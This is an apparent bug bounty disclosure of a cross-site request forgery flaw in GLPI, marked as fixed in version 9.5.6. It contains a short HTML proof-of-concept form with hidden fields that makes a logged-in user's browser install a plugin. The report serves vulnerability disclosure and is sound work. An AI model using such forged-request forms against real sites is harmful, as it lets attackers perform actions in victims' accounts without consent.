Cross-Site Request Forgery (CSRF) in glpi-project/glpi


Reported on

Sep 10th 2021

✍️ Description

Hello dear glpi team I found one more CSRF vulnerability.

🕵️‍♂️ Proof of Concept

1.fisrt user already should be logged in In Firefox or safari.

2.Open the PoC.html and click on submit button ( Also it can be auto-submit)

3.Here pdf plugin will be installed after clicking on submit button on PoC.html file.

// PoC.html

  <script>history.pushState('', '', '/')</script>
    <form action="">
      <input type="hidden" name="action" value="install&#95;plugin" />
      <input type="hidden" name="key" value="pdf" />
      <input type="submit" value="Submit request" />
We have contacted a member of the glpi-project/glpi team and are waiting to hear back 2 years ago
glpi-project/glpi maintainer validated this vulnerability 2 years ago
am0o0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
François Legastelois marked this as fixed in 9.5.6 with commit 93750e 2 years ago
François Legastelois has been awarded the fix bounty
to join this conversation